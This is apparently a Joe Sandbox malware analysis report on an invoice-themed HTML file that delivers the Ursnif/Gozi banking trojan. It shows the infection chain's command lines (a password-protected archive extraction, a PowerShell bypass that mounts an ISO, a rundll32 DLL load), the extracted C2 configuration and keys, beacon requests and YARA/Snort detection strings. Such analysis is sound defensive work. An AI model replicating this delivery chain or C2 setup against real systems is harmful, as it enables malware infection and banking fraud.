Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Invoice_7892_18Oct.html

Overview

General Information

Sample Name:Invoice_7892_18Oct.html
Analysis ID:725636
MD5:381a9e7c191245cc7e014e19a2c19442
SHA1:f748050e061bb407d06a38009b7669783a1e0936
SHA256:7d04f52af134980eef9544350ee216457910e7531a60c88ec9fa80daae59c2d3
Tags:5000htmlUrsnif
Infos:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected Ursnif
Snort IDS alert for network traffic
Found stalling execution ending in API Sleep call
HTML document with suspicious title
Writes or reads registry keys via WMI
Found API chain indicative of debugger detection
HTML document with suspicious name
Found evasive API chain (may stop execution after checking system information)
Writes registry values via WMI
Uses 7zip to decompress a password protected archive
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Contains capabilities to detect virtual machines
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • chrome.exe (PID: 1544 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
    • chrome.exe (PID: 5700 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1960 --field-trial-handle=1828,i,17767483613737774087,6421309370746719837,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
    • unarchiver.exe (PID: 7032 cmdline: C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\8fa2db5f-d558-4ee3-8a83-68f3e15e482f.zip MD5: 7191DD7E0FE495A5CBF4036801562347)
      • 7za.exe (PID: 7092 cmdline: C:\Windows\System32\7za.exe" x -p758493 -y -o"C:\Users\user\AppData\Local\Temp\krjmempf.vdz" "C:\Users\user\Downloads\8fa2db5f-d558-4ee3-8a83-68f3e15e482f.zip MD5: 77E556CDFDC5C592F5C46DB4127C6F4C)
        • conhost.exe (PID: 6864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 1884 cmdline: cmd.exe" /c powershell.exe -ex bypass -command Mount-DiskImage -ImagePath "C:\Users\user\AppData\Local\Temp\krjmempf.vdz\5353.iso MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 5136 cmdline: powershell.exe -ex bypass -command Mount-DiskImage -ImagePath "C:\Users\user\AppData\Local\Temp\krjmempf.vdz\5353.iso" MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • cmd.exe (PID: 6448 cmdline: "C:\Windows\System32\cmd.exe" /c internee\highlighted.cmd dll32.exe tem dows MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • xxl.exe (PID: 6504 cmdline: C:\Users\user\AppData\Local\Temp\xxl.exe internee\reservations.3ds,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • chrome.exe (PID: 6432 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\Invoice_7892_18Oct.html MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
  • cleanup
{"RSA Public Key": "oZWPUqrPbA1nh5KeblvW58CGuN1e4qDR3J71aATar5O00raqKE8xUkhFQUaw8R0BlZUnpL1tyzW+efqFkhCLYWrMw9nZJeYEd473/0tPEq2VGwv1oB9Pv2/fdgDd6u50PW0dH+R3uMkcvvSQWa4B8bKoi7inCm10C8UL7vaPiLpNIvtqiX4DmnU8XJVFUqOUDuOPHQVcBCPrZcWDAnVXnLWrHhRfXLI5WYFsVRJSde33pVRkM7XdYHtOhkTQlmghQJYxytxJ0sf95vDL6iv7epWQHBvzkG4uQNqLKhs25dvCXYJYNvjJXuqOqa9OkYezI8hW7hiiyxvLszulw2SxcIP0Ki+iShbrMtTsnnUoNQ4=", "c2_domain": ["config.edge.skype.com", "onlinetwork.top", "linetwork.top"], "botnet": "5000", "server": "50", "serpent_key": "7Lmoq8QMk7P7gY63", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
SourceRuleDescriptionAuthorStrings
Invoice_7892_18Oct.htmlMAL_QBot_HTML_Smuggling_Indicators_Oct22_1Detects double encoded PKZIP headers as seen in HTML files used by QBotFlorian Roth
  • 0xe0a:$sd3: VRXNEQkJRQUFRQUlB
  • 0x11:$htm: <html
SourceRuleDescriptionAuthorStrings
0000000E.00000003.424404208.00000000053F8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    0000000E.00000003.424404208.00000000053F8000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_fd494041unknownunknown
    • 0xff0:$a1: /C ping localhost -n %u && del "%s"
    • 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
    • 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
    • 0xca8:$a5: filename="%.4u.%lu"
    • 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xe72:$a9: &whoami=%s
    • 0xe5a:$a10: %u.%u_%u_%u_x%u
    • 0xc22:$a11: size=%u&hash=0x%08x
    • 0xc13:$a12: &uptime=%u
    • 0xda7:$a13: %systemroot%\system32\c_1252.nls
    • 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
    0000000E.00000003.424404208.00000000053F8000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_261f5ac5unknownunknown
    • 0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
    • 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu"
    • 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)
    • 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\
    • 0x1c68:$a9: Software\AppDataLow\Software\Microsoft\
    0000000E.00000003.424565184.00000000053F8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      0000000E.00000003.424565184.00000000053F8000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_fd494041unknownunknown
      • 0xff0:$a1: /C ping localhost -n %u && del "%s"
      • 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
      • 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
      • 0xca8:$a5: filename="%.4u.%lu"
      • 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
      • 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X
      • 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X
      • 0xe72:$a9: &whoami=%s
      • 0xe5a:$a10: %u.%u_%u_%u_x%u
      • 0xc22:$a11: size=%u&hash=0x%08x
      • 0xc13:$a12: &uptime=%u
      • 0xda7:$a13: %systemroot%\system32\c_1252.nls
      • 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
      Click to see the 30 entries
      SourceRuleDescriptionAuthorStrings
      14.2.xxl.exe.4ef94a0.4.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
        14.2.xxl.exe.2df4431.1.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
          14.2.xxl.exe.10000000.5.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
            14.2.xxl.exe.31b0000.3.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              14.2.xxl.exe.2dfe040.2.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                Click to see the 1 entries
                No Sigma rule has matched
                Timestamp:192.168.2.531.41.44.19449740802033204 10/18/22-21:44:26.183837
                SID:2033204
                Source Port:49740
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.531.41.44.19449740802033203 10/18/22-21:44:26.183837
                SID:2033203
                Source Port:49740
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.58.8.8.860284532023883 10/18/22-21:44:26.088642
                SID:2023883
                Source Port:60284
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic

                Click to jump to signature section

                Show All Signature Results
                Source: 14.2.xxl.exe.10000000.5.unpackAvira: Label: TR/Crypt.XPACK.Gen8
                Source: 14.2.xxl.exe.31b0000.3.unpackMalware Configuration Extractor: Ursnif {"RSA Public Key": "oZWPUqrPbA1nh5KeblvW58CGuN1e4qDR3J71aATar5O00raqKE8xUkhFQUaw8R0BlZUnpL1tyzW+efqFkhCLYWrMw9nZJeYEd473/0tPEq2VGwv1oB9Pv2/fdgDd6u50PW0dH+R3uMkcvvSQWa4B8bKoi7inCm10C8UL7vaPiLpNIvtqiX4DmnU8XJVFUqOUDuOPHQVcBCPrZcWDAnVXnLWrHhRfXLI5WYFsVRJSde33pVRkM7XdYHtOhkTQlmghQJYxytxJ0sf95vDL6iv7epWQHBvzkG4uQNqLKhs25dvCXYJYNvjJXuqOqa9OkYezI8hW7hiiyxvLszulw2SxcIP0Ki+iShbrMtTsnnUoNQ4=", "c2_domain": ["config.edge.skype.com", "onlinetwork.top", "linetwork.top"], "botnet": "5000", "server": "50", "serpent_key": "7Lmoq8QMk7P7gY63", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeCode function: 14_2_031B47E5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
                Source: C:\Windows\SysWOW64\unarchiver.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\GoogleUpdaterJump to behavior
                Source: Binary string: rundll32.pdb source: xxl.exe, xxl.exe, 0000000E.00000000.368749240.0000000000CB1000.00000020.00000001.01000000.00000005.sdmp, xxl.exe.12.dr
                Source: Binary string: rundll32.pdbGCTL source: xxl.exe, 0000000E.00000000.368749240.0000000000CB1000.00000020.00000001.01000000.00000005.sdmp, xxl.exe.12.dr

                Networking

                barindex
                Source: TrafficSnort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.5:60284 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49740 -> 31.41.44.194:80
                Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49740 -> 31.41.44.194:80
                Source: Joe Sandbox ViewASN Name: ASRELINKRU ASRELINKRU
                Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                Source: Invoice_7892_18Oct.htmlString found in binary or memory: https://fonts.googleapis.com/css2?family=Open
                Source: unknownHTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: unknownDNS traffic detected: queries for: accounts.google.com
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeCode function: 14_2_031B4F4B ResetEvent,ResetEvent,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError,
                Source: global trafficHTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmiedaX-Goog-Update-Updater: chromecrx-104.0.5112.81Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /drew/UogjlH55j3MBdVW7Zgv8/7VAIAiwJ_2FicnQxfIo/vdYsidWojPlxWiOLycfrCH/0jMFVE77apOpr/yiV9EWj6/4LmIXy_2FzHYZsf_2BzbbER/6LftEOfnlg/Uzke2V7qIbQmNXXHb/tnLubrQ7fIkI/GL44ItzX_2B/5weW8TeiFRMx3R/0FalNtY_2FOlb5Arb_2Fa/ayhw4EzvdF98V_2F/QvfDYcXOi_2FxiR/FUnDGyMWNFOFvK99Tq/AboGOqHpH/FFIxlK22ZxSjYALa3Nyd/r2bY6gbX_2BKLnqSzWK/N5bQl56P/1.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: onlinetwork.topConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /drew/0J0YP9e_2BE7jjAw7XL/AjrHr6NCwO_2Fgj3xqU8HO/e5KwJWvAPxhz7/Er8_2FGw/w6mbMJPoDfQgM_2F5q_2BTA/2EWmrv1LcM/HkHdywibkWgZEZttV/CVVHNFdmhCzK/32gECX5_2BF/KHHudCe_2FBTtm/7PKDpa0dUHWbR_2B1kpX9/AWYTWzr3Mrqxmvg2/b3_2B3bUAXRAtbT/lS0IcV4DbS6jYYG_2F/Ohgp0G9Gj/CtOwH_2BiEVt378VRySb/pgZSH7eC_2Bee3HXiCJ/BjrtGyiuFj_2Fduvn85Qkm/9VcCSZNN/bQ6ATZ6.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: linetwork.topConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /drew/9HjvFMPL_/2BodLadHv2Ij_2BnGRof/O5HwRn2RgD6rqZ1SvG5/VMrxgkKm7ed8PnDV4333Df/zIgAPypmoxSLi/8BFA8aIq/BD3jcPWLpFftdB57Hvs_2Bt/pdv8XCmdY6/t4jYCo1nX0gAaeZmr/b90Tdg7fzlxH/cqhZiWRACEm/b39xMwhhk6CBY5/vAnGlr5gQfe7832Po6dgp/kFDd8JW_2BQt2yuf/g3y_2BsnEgcapzm/FqXLCXTc0ul_2Fu7dh/W1oq_2BeZ/dlpTOTrr2A44rzvoNR9t/Ed7vICgSqP/MZk6s.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: onlinetwork.topConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /drew/TVgVtfJMME1TQDqbWdYo/ezMinaihuLtBtHa0yLo/29N_2BdcUX8GiKCW_2FFcH/G2EEXMAEzocHs/1j0yJOR1/eGMTPdpRhncWUghvDrmpfdi/eKYCLFtVRB/CVYtk9exYzeSrEd9o/r1M5RtNeelrL/BOq3WhytwH0/LSHm7cB7uN0f_2/BOF5OriNbSGHY_2Bu3zcM/HQrJ_2FDizJQq2kU/CdUDwQJw3ybpG6w/prA2XAjnZImMTnv_2B/y35swvqbW/8ll_2FkkiqSxdgXsTIPh/ZgYm_2BBwbPVDYoRfa8/RjAv97g.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: linetwork.topConnection: Keep-AliveCache-Control: no-cache

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: Yara matchFile source: 0000000E.00000003.424404208.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000003.424565184.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000003.424527278.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000003.424606471.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000003.641720326.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.719654681.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000003.424635510.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000003.424671008.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000003.424712096.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000003.424336717.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: xxl.exe PID: 6504, type: MEMORYSTR
                Source: Yara matchFile source: 14.2.xxl.exe.4ef94a0.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.xxl.exe.2df4431.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.xxl.exe.10000000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.xxl.exe.31b0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.xxl.exe.2dfe040.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.xxl.exe.2df4431.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.719611917.0000000004EF9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.719379551.0000000002DE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 0000000E.00000003.424404208.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000003.424565184.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000003.424527278.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000003.424606471.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000003.641720326.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.719654681.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000003.424635510.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000003.424671008.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000003.424712096.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000003.424336717.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: xxl.exe PID: 6504, type: MEMORYSTR
                Source: Yara matchFile source: 14.2.xxl.exe.4ef94a0.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.xxl.exe.2df4431.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.xxl.exe.10000000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.xxl.exe.31b0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.xxl.exe.2dfe040.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.xxl.exe.2df4431.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.719611917.0000000004EF9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.719379551.0000000002DE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeCode function: 14_2_031B47E5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

                System Summary

                barindex
                Source: 0000000E.00000003.424404208.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 0000000E.00000003.424404208.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 0000000E.00000003.424565184.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 0000000E.00000003.424565184.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 0000000E.00000003.424527278.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 0000000E.00000003.424527278.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 0000000E.00000003.424606471.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 0000000E.00000003.424606471.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 0000000E.00000003.641720326.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 0000000E.00000003.641720326.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 0000000E.00000002.719654681.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 0000000E.00000002.719654681.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 0000000E.00000003.424635510.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 0000000E.00000003.424635510.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 0000000E.00000003.424671008.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 0000000E.00000003.424671008.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 0000000E.00000003.424712096.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 0000000E.00000003.424712096.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 0000000E.00000003.424336717.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 0000000E.00000003.424336717.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: Process Memory Space: xxl.exe PID: 6504, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: Process Memory Space: xxl.exe PID: 6504, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: file:///C:/Users/user/Desktop/Invoice_7892_18Oct.htmlTab title: Invoice_7892_18Oct.html
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                Source: Name includes: Invoice_7892_18Oct.htmlInitial sample: invoice
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\7za.exe C:\Windows\System32\7za.exe" x -p758493 -y -o"C:\Users\user\AppData\Local\Temp\krjmempf.vdz" "C:\Users\user\Downloads\8fa2db5f-d558-4ee3-8a83-68f3e15e482f.zip
                Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\7za.exe C:\Windows\System32\7za.exe" x -p758493 -y -o"C:\Users\user\AppData\Local\Temp\krjmempf.vdz" "C:\Users\user\Downloads\8fa2db5f-d558-4ee3-8a83-68f3e15e482f.zip
                Source: Invoice_7892_18Oct.html, type: SAMPLEMatched rule: MAL_QBot_HTML_Smuggling_Indicators_Oct22_1 date = 2022-10-07, hash5 = ff4e21f788c36aabe6ba870cf3b10e258c2ba6f28a2d359a25d5a684c92a0cad, hash4 = 5072d91ee0d162c28452123a4d9986f3df6b3244e48bf87444ce88add29dd8ed, hash3 = c5d23d991ce3fbcf73b177bc6136d26a501ded318ccf409ca16f7c664727755a, hash2 = 8e61c2b751682becb4c0337f5a79b2da0f5f19c128b162ec8058104b894cae9b, author = Florian Roth, description = Detects double encoded PKZIP headers as seen in HTML files used by QBot, score = 4f384bcba31fda53e504d0a6c85cee0ce3ea9586226633d063f34c53ddeaca3f, reference = https://twitter.com/ankit_anubhav/status/1578257383133876225?s=20&t=Bu3CCJCzImpTGOQX_KGsdA
